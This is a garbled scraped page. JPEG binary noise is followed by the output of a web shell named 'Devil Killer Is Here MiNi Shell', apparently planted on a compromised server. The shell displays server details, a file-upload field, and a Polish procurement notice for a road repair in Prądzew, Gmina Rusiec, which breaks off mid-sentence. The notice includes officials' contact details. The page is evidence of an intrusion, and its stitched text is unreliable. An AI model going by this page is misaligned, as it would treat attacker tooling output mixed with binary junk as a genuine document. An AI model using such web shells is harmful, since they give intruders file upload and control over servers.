JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231025/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231025/0046161701-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont drogi gminnej nr 117351E w miejscowości Prądzew </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA RUSIEC</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 730934708</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Wieluńska 35</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rusiec</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">97-438</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL713 - Piotrkowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">43/6766011</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@rusiec.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.rusiec.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont drogi gminnej nr 117351E w miejscowości Prądzew </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-dc46131b-7328-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00461617</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-10-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00085651/12/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.8 Remont drogi gminnej nr 117351E w miejscowości Prądzew</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-dc46131b-7328-11ee-a60c-9ec5599dddc1 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a<br/>Wykonawcami odbywa się drogą elektroniczną przy użyciu platformy e-Zamówienia („Platforma”) https://ezamowienia.gov.pl/ lub<br/>poczty elektronicznej: anastazja.dzbik@rusiec.pl, z zastrzeżeniem, że złożenie oferty konieczne jest wyłącznie przy użyciu<br/>Platformy.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja między Zamawiającym a Wykonawcami odbywa się drogą elektroniczną przy użyciu platformy e-Zamówienia dalej zw. Platforma:https://ezamowienia.gov.pl/ lub poczty elektr.:anastazja.dzbik@rusiec.pl,z zastrzeżeniem, że złożenie oferty konieczne jest wyłącznie przy użyciu Platformy.Korzystanie z Platformy jest bezpłatne.Zamawiający wyznacza następujące osoby do kontaktu z wykonawcami:Anastazja Dzbik ,tel43/6766011wew.214<br/>e mail:anastazja.dzbik@rusiec.pl,Marek Łopata,tel.43/6766011wew. 227email:<br/>marek.lopata@rusiec.pl Adres strony internetowej prowadzonego postępowania(link prowadzący bezpośrednio do widoku postępowania na Platformie)oraz Identyfikator(ID)postępowania na platformie znajdują się w Załączniku nr6 do niniejszej SWZ.Postępowanie można wyszukać również ze strony głównej Platformy(wybierając przycisk „przeglądaj<br/>postępowanie/konkursy”).Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto podmiotu„Wykonawca”na Platformie.Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy określa Regulamin Platformy, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce”Centrum pomocy”.Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie ani logowania.Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej(cyfrowe odwzorowania)musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów w sprawie wymagań dla dokumentów<br/>elektronicznych.Dokumenty elektroniczne,o których mowa w §2ust.1rozporz. Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych,sporządza się w postaci elektronicznej,w formatach danych określonych w przepisach rozporz. Rady Ministrów w sprawie Krajowym Ram Interoperacyjności,z uwzględnieniem rodzaju przekazywanych danych i przekazuje je jako załączniki.W przypadku formatów,o których mowa w art.66ust.1 ustawy Pzp,ww. regulacje nie będą miały bezpośredniego<br/>zastosowania.Informacje,oświadczenia lub dokumenty,inne niż wymienione w§2ust.1rozporz. Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych,przekazywane w postępowaniu sporządza się w postaci elektronicznej:a)w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności(i przekazuje się jako załącznik),lub b)jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji<br/>elektronicznej(np.w treści wiad. e-mail lub w treści„Formularza do komunikacji”).Jeżeli dokumenty elektroniczne,przekazywane przy<br/>użyciu środków komunikacji elektronicznej,zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów<br/>ustawy z dnia 16kwietnia1993r. o zwalczaniu nieuczciwej konkurencji(Dz.U.z2020r.poz.1913oraz z 2021r.poz.1655) wykonawca,w<br/>celu utrzymania w poufności tych informacji,przekazuje je w wydzielonym i odpowiednio oznaczonym pliku,wraz z jednoczesnym<br/>zaznaczeniem w nazwie pliku„Dokument stanowiący tajemnicę przedsiębiorstwa”.Komunikacja w postępowaniu,z wyłączeniem<br/>składania ofert/wniosków o dopuszczenie do udziału w postępowaniu,może odbywać się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce„Formularze”(„Formularze do komunikacji”).Korespondencja przesłana za pomocą tego formularza nie może być szyfrowana.We wszelkiej korespondencji związanej z niniejszym postępowaniem zamawiający i wykonawcy posługują się numerem ogłoszenia ID postępowania.Za pośrednictwem„formularzy do komunikacji”odbywa się w<br/>szczególności przekazywanie wezwań,zawiadomień i wniosków służących do zadawania pytań o wyjaśnienie treści SWZ.Pozostałe zapisy umieszczone są rozdz.XII SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art.13ust.1 i 2 oraz art.14 rozporz. Parlamentu Europejskiego i<br/>Rady(UE)2016/679 z dnia 27kwietnia2016r.w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w<br/>sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy95/46/WE(ogólne rozporz.o ochronie danych)(Dz.Urz.UE L<br/>119 z04.05.2016,str.1),dalej„RODO”,informuję,że:1)administratorem Pani/Pana danych osobowych jest Urząd Gminy Rusiec<br/>reprezentowany przez Wójta Gminy Rusiec Damiana Szczytowskiego,2)Administrator wyznaczył Inspektora Ochrony Danych Pan<br/>Rafał Andrzejewski,z którym można skontaktować się pod adresem email:iod.r.andrzejewski@szkoleniaprawnicze.com.pl oraz<br/>telefonicznie pod nr tel.504 976 690,3)Dane osobowe wykonawcy będą przetwarzane na podstawie art.6ust.1 lit.c RODO oraz na<br/>podstawie przepisów ustawy z dnia 11września2019r.Prawo zamówień publicznych(t.j.Dz.U.z2022r.poz.1710z późn. zm.)<br/>„ustawaPzp”;w celu związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego prowadzonym w trybie<br/>podstawowym bez negocjacji, zawarciem umowy oraz jej realizacją oraz na podstawie art.6ust.1lit.f RODO.W przypadku<br/>przetwarzania danych osobowych na podstawie art.6ust.1lit.f)RODO za prawnie uzasadniony interes Administratora uznaje się:a)ustalenie lub dochodzenie przez Administratora roszczeń cywilnoprawnych wynikających z realizacji niniejszej Umowy, a także<br/>obrona przed takimi roszczeniami;b)weryfikacja danych osobowych w publicznych rejestrach4)Odbiorcami Pani/Pana<br/>danychosobowych będą osoby lub podmioty upoważnione zgodnie z przepisami prawa powszechnie obowiązującego, którym<br/>udostępniona<br/>zostanie dokumentacja postępowania, w tym w szczególności w oparciu o art.18 oraz art.74 ustawy Pzp.Odbiorcami państwa danych<br/>będą: podmioty i organy, którym Administrator jest zobowiązany lub upoważniony udostępnić dane osobowe na podstawie<br/>powszechnie obowiązujących przepisów prawa, oraz podmioty, które na podstawie stosownych umów przetwarzają dane osobowe<br/>powierzone do przetwarzania przez Administratora w związku z realizacją usług gwarantujących należyte wykonanie niniejszej<br/>Umowy;5)Pani/Pana dane osobowe będą przechowywane, zgodnie z art.78ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia,a jeżeli czas trwania umowy przekracza 4 lata,okres przechowywania obejmuje cały czas<br/>trwania umowy. W przypadku zawarcia i realizacji umowy obejmuje również okres niezbędny do zabezpieczenia ewentualnych<br/>roszczeń wynikających z umowy, chyba, że przepisy szczegółowe stanowią inaczej;6)Obowiązek podania przez Panią/Pana danych<br/>osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp w związku z<br/>art.6ust.1 lit.c RODO związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania<br/>określonych danych wynikają z ustawy Pzp;7)W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w<br/>sposób zautomatyzowany, stosowanie do art. 22 RODO;8)posiada Pani/Pan:na podstawie art.15RODO prawo dostępu do danych<br/>osobowych Pani/Pana dotyczących;na podstawie art.16RODO prawo do sprostowania Pani/Pana danych osobowych;na podstawie<br/>art.18RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków,o<br/>których mowa w art.18ust.2RODO;prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan,<br/>że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;prawo do wniesienia sprzeciwu wobec<br/>przetwarzania danych osobowych,który administrator przetwarza na podstawie art.6 ust.1 lit.f RODO w związku z treścią pkt<br/>3)i5);9)nie przysługuje Pani/Panu:w związku z art.17 ust.3 lit.b,d lub e RODO prawo do usunięcia danych osobowych;prawo do<br/>przenoszenia danych osobowych,o którym mowa w art.20 RODO;na podstawie art.21RODO,prawo sprzeciwu, wobec przetwarzania<br/>danych osobowych,gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art.6 ust.1lit.c RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GB3.271.12.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiot zamówienia stanowi wykonanie robót budowlanych w ramach zadania pn.: „Remont drogi gminnej nr 117351E w miejscowości Prądzew”, dofinansowanego <br/>z Rządowego Funduszu Rozwoju Dróg.<br/>2.	Zakres robót do wykonania obejmuje wykonanie prac w zakresie odcinka drogi wynoszący 316,90 metrów, położonej na działce nr ewid. 267, 955/1 obr. Prądzew, gm. Rusiec w km od 0+401,45 do km 0+718,35, w granicach istniejącego pasa drogowego. Zakres robót obejmuje w szczególności:<br/>a)	roboty przygotowawcze i rozbiórkowe,<br/>b)	jezdnię – odtworzenie uszkodzonej konstrukcji jezdni,<br/>c)	jezdnię – remont,<br/>d)	regulację wysokościową chodnika i zjazdów,<br/>e)	oznakowanie oraz urządzenia bezpieczeństwa ruchu,<br/>f)	roboty związane z poboczami,<br/>g)	roboty utrzymaniowe – oczyszczenie istniejących rowów,<br/>h)	roboty wykończeniowe.<br/>3.	Szczegółowy zakres przedmiotu zamówienia został określony w dokumentacji technicznej (Załącznik nr 7), na którą składa się:<br/>1)	Specyfikacja Techniczna Wykonania i Odbioru Robót Budowlanych (dalej jako „STWiORB”), <br/>2)	Projekt Budowlano-Wykonawczy wraz z opinią geotechniczną, rysunkami oraz informacją BIOZ,<br/>3)	Przedmiar robót,<br/>4)	Projekt Zmiany Stałej Organizacji Ruchu,<br/>5)	Zgłoszenie robót budowalnych nr AB.6743.126.2022.2.PK z dnia 08.12.2022 r. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233142-6 - Roboty w zakresie naprawy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">1 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający będzie oceniał oferty w następujących kryteriach: Kryterium Cena - maksymalna liczba<br/>pkt. 60 oraz kryterium Okres gwarancji - maksymalna liczba pkt. 40. Zamawiający dokona oceny ofert przydzielając punkty w każdym<br/>z przyjętych kryteriów, które następnie zostaną zsumowane.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający przed<br/>wyborem najkorzystniejszej oferty wezwie wykonawcę,którego oferta została najwyżej oceniona,do złożenia w wyznaczonym<br/>terminie,nie krótszym niż 5 dni,aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych:1)W celu<br/>potwierdzenia braku podstaw do wykluczenia wykonawcy z udziału w postępowaniu,o których mowa w rozdziale Xust.1 SWZ<br/>Zamawiający żąda na wezwanie,o którym mowa w ust.4 powyżej następujących dokumentów:a)oświadczenia wykonawcy,w<br/>zakresie art.108ust.1pkt 5ustawy,o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007<br/>r.o ochronie konkurencji i konsumentów(Dz.U.z2020r.poz.1076 i1086),z innym wykonawcą,który złożył odrębną ofertę,ofertę<br/>częściową lub wniosek o dopuszczenie do udziału w postępowaniu,albo oświadczenia o przynależności do tej samej grupy<br/>kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty,oferty częściowej lub wniosku o<br/>dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej(według<br/>wzoru stanowiącego załącznik nr3do SWZ);b)oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu,o którym<br/>mowa w art.125ust.1ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego,o których mowa<br/>w:-art.108ust. 1pkt 3ustawy,-art.108ust.1pkt4ustawy,dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem<br/>środka zapobiegawczego,-art. 108 ust. 1 pkt 5 ustawy, dotyczących zawarcia z innymi wykonawcami porozumienia mającego na<br/>celu zakłócenie konkurencji,-art.108ust.1pkt6 ustawy(według wzoru stanowiącego załącznik nr 4 do SWZ).5.Wykonawca nie jest<br/>zobowiązany do złożenia podmiotowych środków dowodowych, które zamawiający posiada, jeżeli wykonawca wskaże te środki oraz<br/>potwierdzi ich prawidłowość i aktualność.6.Wykonawca składa podmiotowe środki dowodowe aktualne na dzień ich złożenia.7.W<br/>przypadku oferty składanej przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego, dokumenty<br/>potwierdzające,że Wykonawca nie podlega wykluczeniu składa każdy z Wykonawców oddzielnie.8.Samooczyszczenie–w<br/>okolicznościach określonych w art.108ust.1 pkt1,2,i5ustawy Pzp wykonawca nie podlega wykluczeniu jeżeli udowodni<br/>zamawiającemu, że spełnił łącznie następujące przesłanki:1)naprawił lub zobowiązał się do naprawienia szkody wyrządzonej<br/>przestępstwem, wykroczeniem lub swoim nieprawidłowym postępowaniem,w tym poprzez zadośćuczynienie<br/>pieniężne;2)wyczerpująco wyjaśnił fakty i okoliczności związane z przestępstwem, wykroczeniem lub swoim nieprawidłowym<br/>postępowaniem oraz spowodowanymi przez nie szkodami, aktywnie współpracując odpowiednio z właściwymi organami,w tym<br/>organami ścigania lub zamawiającym;3)podjął konkretne środki techniczne, organizacyjne i kadrowe, odpowiednie dla zapobiegania<br/>dalszym przestępstwom, wykroczeniom lub nieprawidłowemu postępowaniu, w szczególności:a)zerwał wszelkie powiązania z<br/>osobami lub podmiotami odpowiedzialnymi za nieprawidłowe postępowanie wykonawcy,b)zreorganizował personel,c)wdrożył<br/>system sprawozdawczości i kontroli,d)utworzył struktury audytu wewnętrznego do monitorowania przestrzegania przepisów,<br/>wewnętrznych regulacji lub standardów,e)wprowadził wewnętrzne regulacje dotyczące odpowiedzialności i odszkodowań za<br/>nieprzestrzeganie przepisów, wewnętrznych regulacji lub standardów.Zamawiający ocenia, czy podjęte przez wykonawcę czynności<br/>są wystarczające do wykazania jego rzetelności,uwzględniając wagę i szczególne okoliczności czynu wykonawcy, a jeżeli uzna, że<br/>nie są wystarczające, wyklucza wykonawcę.Szczegółowe informacje zostały zawarte w rozdziale XI SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia zgodnie z art. 58 ustawy. W takim przypadku, wykonawcy<br/>ustanawiają pełnomocnika do reprezentowania ich w postępowaniu<br/>o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego.Jeżeli oferta wykonawców, o której mowa w zdaniu 